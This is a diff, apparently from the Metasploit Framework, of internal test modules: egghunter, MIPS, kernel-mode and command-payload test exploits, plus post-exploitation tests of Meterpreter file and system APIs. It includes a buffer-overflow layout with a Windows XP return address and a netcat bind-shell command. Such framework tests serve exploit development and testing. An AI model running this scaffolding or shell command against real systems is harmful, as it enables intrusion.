'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
def exploit
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+104 -104
@@ -12,123 +12,123 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
def initialize(info = {})
super(update_info(info,
'Name' => 'MIPS Aggressive Test Exploit',
'Description' => 'This module tests the exploitation of a test service',
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
#'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'MaxNops' => 0,
#'BadChars' => "\x00",
#'StackAdjustment' => -3500,
},
'Targets' =>
[
# Target 0: Universal
[
'Mips big endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE
}
],
[
'Mips big endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips big endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
[
'Mips little endian',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE
}
],
[
'Mips little endian cannot be encoded',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
}
}
], [
'Mips little endian encoder needed',
{
'Platform' => [ 'linux', 'win' ],
'Arch' => ARCH_MIPSLE,
'Payload' =>
{
'BadChars' => "\x00"
}
}
],
],
'DefaultTarget' => 0))
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
])
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
def exploit
# Show disassembled payload for context encoder test
if target.name =~ /context encoder/
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
end
connect
connect
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
print_status("Sending #{payload.encoded.length} byte payload...[#{datastore['TestInteger']}]")
sock.put(payload.encoded)
sock.put(payload.encoded)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
handler
end
end
+35 -35
@@ -13,46 +13,46 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
def initialize( info = {} )
super( update_info( info,
'Name' => 'Exec',
'Description' => %q{ },
'License' => MSF_LICENSE,
'Author' => [ 'egypt' ],
'Version' => '$Revision$',
'References' => [ ],
'Platform' => [ 'java', 'linux' ],
'Arch' => ARCH_JAVA,
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
} ],
[ 'Linux', {
'Arch' => ARCH_X86,
'Platform' => 'linux'
} ],
],
'DefaultTarget' => 0
))
end
end
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
def exploit
# Equivalent to payload.encoded
@jar_data = payload.encoded_jar.pack
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
File.open("payload.jar", "wb") do |fd|
fd.write(@jar_data)
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end
+59 -59
@@ -15,74 +15,74 @@ require 'msf/core'
# This is a test exploit for testing kernel-mode payloads.
#
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
include Msf::Exploit::Remote::Udp
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Kernel-mode Test Exploit',
'Description' =>
"This module tests the exploitation of a kernel-mode test service.",
'Author' => 'skape',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => 'x86',
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
},
'Targets' =>
[
[
'Windows XP SP2',
{
'Ret' => 0x80502d7f, # jmp esp
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'Recovery' => 'spin'
}
}
}
],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect_udp
def exploit
connect_udp
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
buf =
rand_text_alphanumeric(260) +
"\xbe\x7f\x00\x00" +
rand_text_alphanumeric(28) +
[target.ret].pack('V') +
rand_text_alphanumeric(8) +
payload.encoded
udp_sock.put(buf)
udp_sock.put(buf)
select(nil,nil,nil,2)
select(nil,nil,nil,2)
disconnect_udp
end
disconnect_udp
end
end
+37 -37
@@ -12,49 +12,49 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'Command Test',
'Description' => %q{
This module tests cmd payloads by targeting (for example) a server
like: nc -l -p 31337 -e /bin/sh
},
'Author' => 'egypt',
'Version' => '$Revision$',
'References' => [ ],
'DefaultOptions' => { },
'Payload' =>
{
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic Targeting', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(31337),
], self.class)
end
register_options(
[
Opt::RPORT(31337),
], self.class)
end
def autofilter
false
end
def autofilter
false
end
def exploit
connect
def exploit
connect
sock.put(payload.encoded + "\n")
sock.put(payload.encoded + "\n")
handler
end
handler
end
end
+124 -124
@@ -8,162 +8,162 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
include Msf::ModuleTest::PostTest
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote File Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back
#
def setup
@old_pwd = pwd
tmp = (directory?("/tmp")) ? "/tmp" : "%TMP%"
vprint_status("Setup: changing working directory to #{tmp}")
cd(tmp)
super
end
super
end
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
def test_file
it "should test for file existence" do
ret = false
[
"c:\\boot.ini",
"c:\\pagefile.sys",
"/etc/passwd",
"/etc/master.passwd"
].each { |path|
ret = true if file?(path)
}
ret
end
ret
end
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
it "should test for directory existence" do
ret = false
[
"c:\\",
"/etc/",
"/tmp"
].each { |path|
ret = true if directory?(path)
}
ret
end
ret
end
it "should create text files" do
write_file("pwned", "foo")
it "should create text files" do
write_file("pwned", "foo")
file?("pwned")
end
file?("pwned")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
it "should read the text we just wrote" do
f = read_file("pwned")
ret = ("foo" == f)
unless ret
print_error("Didn't read what we wrote, actual file on target: #{f}")
end
ret
end
ret
end
it "should append text files" do
ret = true
append_file("pwned", "bar")
it "should append text files" do
ret = true
append_file("pwned", "bar")
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret &&= read_file("pwned") == "foobar"
append_file("pwned", "baz")
final_contents = read_file("pwned")
ret &&= final_contents == "foobarbaz"
unless ret
print_error("Didn't read what we wrote, actual file on target: #{final_contents}")
end
ret
end
ret
end
it "should delete text files" do
file_rm("pwned")
it "should delete text files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
it "should move files" do
# Make sure we don't have leftovers from a previous run
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
# touch a new file
write_file("meterpreter-test", "")
# touch a new file
write_file("meterpreter-test", "")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
rename_file("meterpreter-test", "meterpreter-test-moved")
res &&= exist?("meterpreter-test-moved")
res &&= !exist?("meterpreter-test")
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
# clean up
file_rm("meterpreter-test") rescue nil
file_rm("meterpreter-test-moved") rescue nil
end
end
end
def test_binary_files
def test_binary_files
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
#binary_data = ::File.read("/bin/ls")
binary_data = ::File.read("/bin/echo")
#binary_data = "\xff\x00\xff\xfe\xff\`$(echo blha)\`"
it "should write binary data" do
vprint_status "Writing #{binary_data.length} bytes"
t = Time.now
write_file("pwned", binary_data)
vprint_status("Finished in #{Time.now - t}")
file_exist?("pwned")
end
file_exist?("pwned")
end
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
it "should read the binary data we just wrote" do
bin = read_file("pwned")
vprint_status "Read #{bin.length} bytes"
bin == binary_data
end
bin == binary_data
end
it "should delete binary files" do
file_rm("pwned")
it "should delete binary files" do
file_rm("pwned")
not file_exist?("pwned")
end
not file_exist?("pwned")
end
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
it "should append binary data" do
write_file("pwned", "\xde\xad")
append_file("pwned", "\xbe\xef")
bin = read_file("pwned")
file_rm("pwned")
bin == "\xde\xad\xbe\xef"
end
bin == "\xde\xad\xbe\xef"
end
end
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
cd(@old_pwd)
super
end
end
+265 -265
@@ -7,336 +7,336 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Meterpreter Stuff',
'Description' => %q{ This module will test meterpreter API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'windows', 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
end
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
#
# Change directory into a place that we have write access.
#
# The +cleanup+ method will change it back. This method is an implementation
# of post/test/file.rb's method of the same name, but without the Post::File
# dependency.
#
def setup
@old_pwd = session.fs.dir.getwd
stat = session.fs.file.stat("/tmp") rescue nil
if (stat and stat.directory?)
tmp = "/tmp"
else
tmp = session.fs.file.expand_path("%TMP%")
end
vprint_status("Setup: changing working directory to #{tmp}")
session.fs.dir.chdir(tmp)
super
end
super
end
def test_sys_process
vprint_status("Starting process tests")
pid = nil
def test_sys_process
vprint_status("Starting process tests")
pid = nil
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
if session.commands.include? "stdapi_sys_process_getpid"
it "should return its own process id" do
pid = session.sys.process.getpid
vprint_status("Pid: #{pid}")
true
end
else
print_status("Session doesn't implement getpid, skipping test")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
it "should return a list of processes" do
ret = true
list = session.sys.process.get_processes
ret &&= (list && list.length > 0)
if session.commands.include? "stdapi_sys_process_getpid"
pid ||= session.sys.process.getpid
process = list.find{ |p| p['pid'] == pid }
vprint_status("PID info: #{process.inspect}")
ret &&= !(process.nil?)
else
vprint_status("Session doesn't implement getpid, skipping sanity check")
end
ret
end
ret
end
end
end
def test_sys_config
vprint_status("Starting system config tests")
def test_sys_config
vprint_status("Starting system config tests")
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a user id" do
uid = session.sys.config.getuid
true
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
it "should return a sysinfo Hash" do
sysinfo = session.sys.config.sysinfo
true
end
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
def test_net_config
unless (session.commands.include? "stdapi_net_config_get_interfaces")
vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
return
end
vprint_status("Starting networking tests")
vprint_status("Starting networking tests")
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
it "should return network interfaces" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res
end
it "should have an interface that matches session_host" do
ifaces = session.net.config.get_interfaces
res = !!(ifaces and ifaces.length > 0)
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res &&= !! ifaces.find { |iface|
iface.addrs.find { |addr|
addr == session.session_host
}
}
res
end
res
end
it "should return network routes" do
routes = session.net.config.get_routes
it "should return network routes" do
routes = session.net.config.get_routes
routes and routes.length > 0
end
routes and routes.length > 0
end
end
end
def test_fs
vprint_status("Starting filesystem tests")
def test_fs
vprint_status("Starting filesystem tests")
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
it "should return the proper directory separator" do
sysinfo = session.sys.config.sysinfo
if sysinfo["OS"] =~ /windows/i
sep = session.fs.file.separator
res = (sep == "\\")
else
sep = session.fs.file.separator
res = (sep == "/")
end
res
end
res
end
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
it "should return the current working directory" do
wd = session.fs.dir.pwd
vprint_status("CWD: #{wd}")
true
end
true
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should list files in the current directory" do
session.fs.dir.entries
end
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
it "should stat a directory" do
dir = session.fs.dir.pwd
vprint_status("Current directory: #{dir.inspect}")
s = session.fs.file.stat(dir)
vprint_status("Stat of current directory: #{s.inspect}")
s.directory?
end
s.directory?
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
it "should create and remove a dir" do
res = create_directory("meterpreter-test")
if (res)
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
end
res
end
res
end
it "should change directories" do
res = create_directory("meterpreter-test")
it "should change directories" do
res = create_directory("meterpreter-test")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
old_wd = session.fs.dir.pwd
vprint_status("Old CWD: #{old_wd}")
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("meterpreter-test")
new_wd = session.fs.dir.pwd
vprint_status("New CWD: #{new_wd}")
res &&= (new_wd =~ /meterpreter-test$/)
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
if res
session.fs.dir.chdir("..")
wd = session.fs.dir.pwd
vprint_status("Back to old CWD: #{wd}")
end
end
session.fs.dir.rmdir("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
vprint_status("Directory removed successfully")
res
end
res
end
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
it "should create and remove files" do
res = true
res &&= session.fs.file.open("meterpreter-test", "wb") { |fd|
fd.write("test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
vprint_status("Wrote to meterpreter-test, checking contents")
res &&= session.fs.file.open("meterpreter-test", "rb") { |fd|
contents = fd.read
vprint_status("Wrote #{contents}")
(contents == "test")
}
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
session.fs.file.rm("meterpreter-test")
res &&= !session.fs.dir.entries.include?("meterpreter-test")
res
end
res
end
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should upload a file" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
if res
fd = session.fs.file.new(remote, "rb")
uploaded_contents = fd.read
until (fd.eof?)
uploaded_contents << fd.read
end
fd.close
original_contents = ::File.read(local)
res &&= !!(uploaded_contents == original_contents)
end
res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
session.fs.file.rm(remote)
res
end
if session.commands.include?("stdapi_fs_file_move")
it "should move files" do
res = true
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# Make sure we don't have leftovers from a previous run
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
# touch a new file
fd = session.fs.file.open("meterpreter-test", "wb")
fd.close
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
session.fs.file.mv("meterpreter-test", "meterpreter-test-moved")
entries = session.fs.dir.entries
res &&= entries.include?("meterpreter-test-moved")
res &&= !entries.include?("meterpreter-test")
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
# clean up
session.fs.file.rm("meterpreter-test") rescue nil
session.fs.file.rm("meterpreter-test-moved") rescue nil
res
end
end
res
end
end
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
it "should do md5 and sha1 of files" do
res = true
remote = "HACKING.remote.txt"
local = "HACKING"
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
if res
remote_md5 = session.fs.file.md5(remote)
local_md5 = Digest::MD5.digest(::File.read(local))
remote_sha = session.fs.file.sha1(remote)
local_sha = Digest::SHA1.digest(::File.read(local))
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
res &&= (remote_md5 == local_md5)
end
session.fs.file.rm(remote)
res
end
session.fs.file.rm(remote)
res
end
end
end
=begin
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
# Sniffer currently crashes on any OS that requires driver signing,
# i.e. everything vista and newer
#
# Disable loading it for now to make it through the rest of the tests.
#
def test_sniffer
begin
session.core.use "sniffer"
rescue
# Not all meterpreters have a sniffer extension, don't count it
# against them.
return
end
it "should list interfaces for sniffing" do
